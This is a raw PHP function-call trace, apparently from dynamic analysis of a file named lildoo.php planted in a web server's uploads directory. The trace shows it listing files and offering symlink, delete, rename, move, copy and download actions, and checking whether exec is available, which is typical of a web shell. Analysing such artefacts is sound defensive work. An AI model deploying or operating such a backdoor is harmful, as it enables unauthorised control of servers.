4	288	0	0.017701	802744	array_key_exists	0		/var/www/html/uploads/lildoo.php	1330	2	'group_name'	['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	288	1	0.017737	802808
4	288	R			TRUE
4	289	0	0.017756	802840	html	1		/var/www/html/uploads/lildoo.php	1339	1	'/var/www/html/uploads/..'
5	290	0	0.017773	802840	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'/var/www/html/uploads/..'	2	NULL
5	290	1	0.017793	803112
5	290	R			'/var/www/html/uploads/..'
4	289	1	0.017812	803000
4	289	R			'/var/www/html/uploads/..'
3		A						/var/www/html/uploads/lildoo.php	1342	$actions = []
4	291	0	0.017845	802368	function_exists	0		/var/www/html/uploads/lildoo.php	1343	1	'symlink'
4	291	1	0.017863	802408
4	291	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1344	$actions[] = 'create_symlink'
4	292	0	0.017895	802744	dirname	0		/var/www/html/uploads/lildoo.php	1346	1	'/var/www/html/uploads/..'
4	292	1	0.017912	802832
4	292	R			'/var/www/html/uploads'
4	293	0	0.017935	802800	is_writable	0		/var/www/html/uploads/lildoo.php	1346	1	'/var/www/html/uploads'
4	293	1	0.018019	802840
4	293	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/lildoo.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/lildoo.php	1349	$actions[] = 'move'
4	294	0	0.018085	802744	function_exists	0		/var/www/html/uploads/lildoo.php	1356	1	'exec'
4	294	1	0.018103	802784
4	294	R			TRUE
4	295	0	0.018120	802744	sizeof	0		/var/www/html/uploads/lildoo.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move']
4	295	1	0.018143	802776
4	295	R			4
4	296	0	0.018161	802840	str_repeat	0		/var/www/html/uploads/lildoo.php	1363	2	'&nbsp;'	30
4	296	1	0.018178	803128
4	296	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	297	0	0.018200	802808	word	1		/var/www/html/uploads/lildoo.php	1367	1	'create_symlink'
5	298	0	0.018217	802808	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'create symlink'	2	'UTF-8'
5	298	1	0.018238	803080
5	298	R			'create symlink'
4	297	1	0.018257	802968
4	297	R			'create symlink'
4	299	0	0.018276	802800	word	1		/var/www/html/uploads/lildoo.php	1367	1	'delete'
5	300	0	0.018292	802800	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'delete'	2	'UTF-8'
5	300	1	0.018311	803072
5	300	R			'delete'
4	299	1	0.018328	802960
4	299	R			'delete'
4	301	0	0.018353	802800	word	1		/var/www/html/uploads/lildoo.php	1367	1	'rename'
5	302	0	0.018370	802800	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'rename'	2	'UTF-8'
5	302	1	0.018389	803072
5	302	R			'rename'
4	301	1	0.018406	802960
4	301	R			'rename'
4	303	0	0.018424	802792	word	1		/var/www/html/uploads/lildoo.php	1367	1	'move'
5	304	0	0.018440	802792	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'move'	2	'UTF-8'
5	304	1	0.018459	803064
5	304	R			'move'
4	303	1	0.018476	802952
4	303	R			'move'
3		A						/var/www/html/uploads/lildoo.php	1249	$i++
4	305	0	0.018507	802744	sizeof	0		/var/www/html/uploads/lildoo.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 5 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
4	305	1	0.018600	802776
4	305	R			6
3		A						/var/www/html/uploads/lildoo.php	1250	$file = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	306	0	0.018653	802744	date	0		/var/www/html/uploads/lildoo.php	1252	2	'n/j/y H:i:s'	1676257694
4	306	1	0.018693	803072
4	306	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1252	$timestamps = 'mtime: 2/12/23 22:08:14, '
4	307	0	0.018729	802688	date	0		/var/www/html/uploads/lildoo.php	1253	2	'n/j/y H:i:s'	1676257694
4	307	1	0.018767	803016
4	307	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1253	$timestamps .= 'atime: 2/12/23 22:08:14, '
4	308	0	0.018802	802712	date	0		/var/www/html/uploads/lildoo.php	1254	2	'n/j/y H:i:s'	1676257694
4	308	1	0.018840	803040
4	308	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1254	$timestamps .= 'ctime: 2/12/23 22:08:14'
4	309	0	0.018875	802936	html	1		/var/www/html/uploads/lildoo.php	1258	1	'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
5	310	0	0.018894	802936	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'	2	NULL
5	310	1	0.018916	803240
5	310	R			'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
4	309	1	0.018945	803128
4	309	R			'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
4	311	0	0.018968	802800	urlencode	0		/var/www/html/uploads/lildoo.php	1281	1	'/var/www/html/uploads/data'
4	311	1	0.018985	802896
4	311	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata'
4	312	0	0.019007	802840	html	1		/var/www/html/uploads/lildoo.php	1281	1	'data'
5	313	0	0.019023	802840	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'data'	2	NULL
5	313	1	0.019041	803112
5	313	R			'data'
4	312	1	0.019059	803000
4	312	R			'data'
4	314	0	0.019077	802744	human_filesize	1		/var/www/html/uploads/lildoo.php	1304	1	4096
4		A						/var/www/html/uploads/lildoo.php	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/lildoo.php	1155	$n = 0
4		A						/var/www/html/uploads/lildoo.php	1157	$filesize /= 1024
4		A						/var/www/html/uploads/lildoo.php	1158	$n++
5	315	0	0.019149	802744	strpos	0		/var/www/html/uploads/lildoo.php	1161	2	4	'.'
5	315	1	0.019166	802816
5	315	R			FALSE
5	316	0	0.019183	802744	round	0		/var/www/html/uploads/lildoo.php	1161	2	4	3
5	316	1	0.019199	802816
5	316	R			4
4		A						/var/www/html/uploads/lildoo.php	1161	$filesize = 4
5	317	0	0.019230	802744	strpos	0		/var/www/html/uploads/lildoo.php	1163	2	4	'.'
5	317	1	0.019247	803072
5	317	R			FALSE
5	318	0	0.019265	802744	substr	0		/var/www/html/uploads/lildoo.php	1169	3	'kMGTPE'	0	1
5	318	1	0.019282	802840
5	318	R			'k'
4		A						/var/www/html/uploads/lildoo.php	1169	$suffix = 'k'
4	314	1	0.019315	802776
4	314	R			'4 kB'
3		A						/var/www/html/uploads/lildoo.php	1304	$human = ' title="4 kB"'
4	319	0	0.019348	802744	decoct	0		/var/www/html/uploads/lildoo.php	1315	1	16895
4	319	1	0.019364	802816
4	319	R			'40777'
4	320	0	0.019387	802744	function_exists	0		/var/www/html/uploads/lildoo.php	1317	1	'posix_getuid'
4	320	1	0.019405	802784
4	320	R			TRUE
4	321	0	0.019422	802744	posix_getuid	0		/var/www/html/uploads/lildoo.php	1317	0
4	321	1	0.019438	802744
4	321	R			33
3		A						/var/www/html/uploads/lildoo.php	1317	$l = FALSE
4	322	0	0.019468	802744	permission_octal2string	1		/var/www/html/uploads/lildoo.php	1319	1	16895
4		A						/var/www/html/uploads/lildoo.php	970	$type = 'd'
4		A						/var/www/html/uploads/lildoo.php	979	$owner = 'r'
4		A						/var/www/html/uploads/lildoo.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/lildoo.php	984	$owner .= 'x'
4		A						/var/www/html/uploads/lildoo.php	987	$group = 'r'
4		A						/var/www/html/uploads/lildoo.php	988	$group .= 'w'
4		A						/var/www/html/uploads/lildoo.php	992	$group .= 'x'
4		A						/var/www/html/uploads/lildoo.php	995	$other = 'r'
4		A						/var/www/html/uploads/lildoo.php	996	$other .= 'w'
4		A						/var/www/html/uploads/lildoo.php	1000	$other .= 'x'
4	322	1	0.019614	802784
4	322	R			'drwxrwxrwx'
4	323	0	0.019633	802784	html	1		/var/www/html/uploads/lildoo.php	1319	1	'drwxrwxrwx'
5	324	0	0.019650	802784	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'drwxrwxrwx'	2	NULL
5	324	1	0.019670	803056
5	324	R			'drwxrwxrwx'
4	323	1	0.019689	802944
4	323	R			'drwxrwxrwx'
4	325	0	0.019707	802744	array_key_exists	0		/var/www/html/uploads/lildoo.php	1324	2	'owner_name'	['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	325	1	0.019746	802808
4	325	R			TRUE
4	326	0	0.019764	802744	array_key_exists	0		/var/www/html/uploads/lildoo.php	1330	2	'group_name'	['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	326	1	0.019801	802808
4	326	R			TRUE
4	327	0	0.019819	802840	html	1		/var/www/html/uploads/lildoo.php	1339	1	'/var/www/html/uploads/data'
5	328	0	0.019836	802840	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'/var/www/html/uploads/data'	2	NULL
5	328	1	0.019856	803112
5	328	R			'/var/www/html/uploads/data'
4	327	1	0.019875	803000
4	327	R			'/var/www/html/uploads/data'
3		A						/var/www/html/uploads/lildoo.php	1342	$actions = []
4	329	0	0.019909	802368	function_exists	0		/var/www/html/uploads/lildoo.php	1343	1	'symlink'
4	329	1	0.019926	802408
4	329	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1344	$actions[] = 'create_symlink'
4	330	0	0.019957	802744	dirname	0		/var/www/html/uploads/lildoo.php	1346	1	'/var/www/html/uploads/data'
4	330	1	0.019974	802832
4	330	R			'/var/www/html/uploads'
4	331	0	0.019993	802800	is_writable	0		/var/www/html/uploads/lildoo.php	1346	1	'/var/www/html/uploads'
4	331	1	0.020016	802840
4	331	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/lildoo.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/lildoo.php	1349	$actions[] = 'move'
4	332	0	0.020075	802744	function_exists	0		/var/www/html/uploads/lildoo.php	1356	1	'exec'
4	332	1	0.020093	802784
4	332	R			TRUE
4	333	0	0.020110	802744	sizeof	0		/var/www/html/uploads/lildoo.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move']
4	333	1	0.020132	802776
4	333	R			4
4	334	0	0.020150	802840	str_repeat	0		/var/www/html/uploads/lildoo.php	1363	2	'&nbsp;'	30
4	334	1	0.020164	803128
4	334	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	335	0	0.020180	802808	word	1		/var/www/html/uploads/lildoo.php	1367	1	'create_symlink'
5	336	0	0.020193	802808	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'create symlink'	2	'UTF-8'
5	336	1	0.020209	803080
5	336	R			'create symlink'
4	335	1	0.020224	802968
4	335	R			'create symlink'
4	337	0	0.020238	802800	word	1		/var/www/html/uploads/lildoo.php	1367	1	'delete'
5	338	0	0.020251	802800	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'delete'	2	'UTF-8'
5	338	1	0.020270	803072
5	338	R			'delete'
4	337	1	0.020287	802960
4	337	R			'delete'
4	339	0	0.020306	802800	word	1		/var/www/html/uploads/lildoo.php	1367	1	'rename'
5	340	0	0.020328	802800	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'rename'	2	'UTF-8'
5	340	1	0.020350	803072
5	340	R			'rename'
4	339	1	0.020377	802960
4	339	R			'rename'
4	341	0	0.020396	802792	word	1		/var/www/html/uploads/lildoo.php	1367	1	'move'
5	342	0	0.020412	802792	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'move'	2	'UTF-8'
5	342	1	0.020430	803064
5	342	R			'move'
4	341	1	0.020447	802952
4	341	R			'move'
3		A						/var/www/html/uploads/lildoo.php	1249	$i++
4	343	0	0.020479	802744	sizeof	0		/var/www/html/uploads/lildoo.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 5 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
4	343	1	0.020572	802776
4	343	R			6
3		A						/var/www/html/uploads/lildoo.php	1250	$file = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	344	0	0.020615	802744	date	0		/var/www/html/uploads/lildoo.php	1252	2	'n/j/y H:i:s'	1676257694
4	344	1	0.020648	803072
4	344	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1252	$timestamps = 'mtime: 2/12/23 22:08:14, '
4	345	0	0.020675	802688	date	0		/var/www/html/uploads/lildoo.php	1253	2	'n/j/y H:i:s'	1676257694
4	345	1	0.020706	803016
4	345	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1253	$timestamps .= 'atime: 2/12/23 22:08:14, '
4	346	0	0.020733	802712	date	0		/var/www/html/uploads/lildoo.php	1254	2	'n/j/y H:i:s'	1676257694
4	346	1	0.020762	803040
4	346	R			'2/12/23 22:08:14'
3		A						/var/www/html/uploads/lildoo.php	1254	$timestamps .= 'ctime: 2/12/23 22:08:14'
4	347	0	0.020789	802936	html	1		/var/www/html/uploads/lildoo.php	1258	1	'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
5	348	0	0.020803	802936	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'	2	NULL
5	348	1	0.020820	803240
5	348	R			'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
4	347	1	0.020836	803128
4	347	R			'mtime: 2/12/23 22:08:14, atime: 2/12/23 22:08:14, ctime: 2/12/23 22:08:14'
4	349	0	0.020953	802744	substr	0		/var/www/html/uploads/lildoo.php	1289	3	'.htaccess'	0	1
4	349	1	0.020968	802840
4	349	R			'.'
4	350	0	0.020983	802824	urlencode	0		/var/www/html/uploads/lildoo.php	1296	1	'/var/www/html/uploads/.htaccess'
4	350	1	0.020997	802936
4	350	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.htaccess'
4	351	0	0.021014	802856	html	1		/var/www/html/uploads/lildoo.php	1296	1	'.htaccess'
5	352	0	0.021027	802856	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'.htaccess'	2	NULL
5	352	1	0.021042	803128
5	352	R			'.htaccess'
4	351	1	0.021055	803016
4	351	R			'.htaccess'
3		A						/var/www/html/uploads/lildoo.php	1306	$human = ''
4	353	0	0.021081	802704	decoct	0		/var/www/html/uploads/lildoo.php	1315	1	33188
4	353	1	0.021093	802776
4	353	R			'100644'
4	354	0	0.021107	802704	function_exists	0		/var/www/html/uploads/lildoo.php	1317	1	'posix_getuid'
4	354	1	0.021120	802744
4	354	R			TRUE
4	355	0	0.021133	802704	posix_getuid	0		/var/www/html/uploads/lildoo.php	1317	0
4	355	1	0.021146	802704
4	355	R			33
3		A						/var/www/html/uploads/lildoo.php	1317	$l = FALSE
4	356	0	0.021169	802704	permission_octal2string	1		/var/www/html/uploads/lildoo.php	1319	1	33188
4		A						/var/www/html/uploads/lildoo.php	966	$type = '-'
4		A						/var/www/html/uploads/lildoo.php	979	$owner = 'r'
4		A						/var/www/html/uploads/lildoo.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/lildoo.php	984	$owner .= '-'
4		A						/var/www/html/uploads/lildoo.php	987	$group = 'r'
4		A						/var/www/html/uploads/lildoo.php	988	$group .= '-'
4		A						/var/www/html/uploads/lildoo.php	992	$group .= '-'
4		A						/var/www/html/uploads/lildoo.php	995	$other = 'r'
4		A						/var/www/html/uploads/lildoo.php	996	$other .= '-'
4		A						/var/www/html/uploads/lildoo.php	1000	$other .= '-'
4	356	1	0.021287	802744
4	356	R			'-rw-r--r--'
4	357	0	0.021301	802744	html	1		/var/www/html/uploads/lildoo.php	1319	1	'-rw-r--r--'
5	358	0	0.021314	802744	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'-rw-r--r--'	2	NULL
5	358	1	0.021329	803016
5	358	R			'-rw-r--r--'
4	357	1	0.021342	802904
4	357	R			'-rw-r--r--'
4	359	0	0.021356	802704	array_key_exists	0		/var/www/html/uploads/lildoo.php	1324	2	'owner_name'	['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	359	1	0.021387	802768
4	359	R			TRUE
4	360	0	0.021400	802704	array_key_exists	0		/var/www/html/uploads/lildoo.php	1330	2	'group_name'	['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	360	1	0.021429	802768
4	360	R			TRUE
4	361	0	0.021443	802800	html	1		/var/www/html/uploads/lildoo.php	1339	1	'/var/www/html/uploads/.htaccess'
5	362	0	0.021456	802800	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'/var/www/html/uploads/.htaccess'	2	NULL
5	362	1	0.021471	803072
5	362	R			'/var/www/html/uploads/.htaccess'
4	361	1	0.021487	802960
4	361	R			'/var/www/html/uploads/.htaccess'
3		A						/var/www/html/uploads/lildoo.php	1342	$actions = []
4	363	0	0.021512	802328	function_exists	0		/var/www/html/uploads/lildoo.php	1343	1	'symlink'
4	363	1	0.021525	802368
4	363	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1344	$actions[] = 'create_symlink'
4	364	0	0.021549	802704	dirname	0		/var/www/html/uploads/lildoo.php	1346	1	'/var/www/html/uploads/.htaccess'
4	364	1	0.021562	802792
4	364	R			'/var/www/html/uploads'
4	365	0	0.021577	802760	is_writable	0		/var/www/html/uploads/lildoo.php	1346	1	'/var/www/html/uploads'
4	365	1	0.021599	802800
4	365	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/lildoo.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/lildoo.php	1349	$actions[] = 'move'
3		A						/var/www/html/uploads/lildoo.php	1352	$actions[] = 'copy'
3		A						/var/www/html/uploads/lildoo.php	1353	$actions[] = 'download'
4	366	0	0.021665	802704	function_exists	0		/var/www/html/uploads/lildoo.php	1356	1	'exec'
4	366	1	0.021678	802744
4	366	R			TRUE
4	367	0	0.021696	802704	sizeof	0		/var/www/html/uploads/lildoo.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move', 4 => 'copy', 5 => 'download']
4	367	1	0.021720	802736
4	367	R			6
4	368	0	0.021737	802800	str_repeat	0		/var/www/html/uploads/lildoo.php	1363	2	'&nbsp;'	30
4	368	1	0.021755	803088
4	368	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	369	0	0.021776	802768	word	1		/var/www/html/uploads/lildoo.php	1367	1	'create_symlink'
5	370	0	0.021795	802768	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'create symlink'	2	'UTF-8'
5	370	1	0.021817	803040
5	370	R			'create symlink'
4	369	1	0.021837	802928
4	369	R			'create symlink'
4	371	0	0.021858	802760	word	1		/var/www/html/uploads/lildoo.php	1367	1	'delete'
5	372	0	0.021906	802760	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'delete'	2	'UTF-8'
5	372	1	0.021924	803032
5	372	R			'delete'
4	371	1	0.021999	802920
4	371	R			'delete'
4	373	0	0.022014	802760	word	1		/var/www/html/uploads/lildoo.php	1367	1	'rename'
5	374	0	0.022028	802760	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'rename'	2	'UTF-8'
5	374	1	0.022042	803032
5	374	R			'rename'
4	373	1	0.022056	802920
4	373	R			'rename'
4	375	0	0.022070	802752	word	1		/var/www/html/uploads/lildoo.php	1367	1	'move'
5	376	0	0.022083	802752	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'move'	2	'UTF-8'
5	376	1	0.022105	803024
5	376	R			'move'
4	375	1	0.022119	802912
4	375	R			'move'
4	377	0	0.022132	802752	word	1		/var/www/html/uploads/lildoo.php	1367	1	'copy'
5	378	0	0.022145	802752	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'copy'	2	'UTF-8'
5	378	1	0.022159	803024
5	378	R			'copy'
4	377	1	0.022171	802912
4	377	R			'copy'
4	379	0	0.022185	802760	word	1		/var/www/html/uploads/lildoo.php	1367	1	'download'
5	380	0	0.022197	802760	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'download'	2	'UTF-8'
5	380	1	0.022211	803032
5	380	R			'download'
4	379	1	0.022225	802920
4	379	R			'download'
3		A						/var/www/html/uploads/lildoo.php	1249	$i++
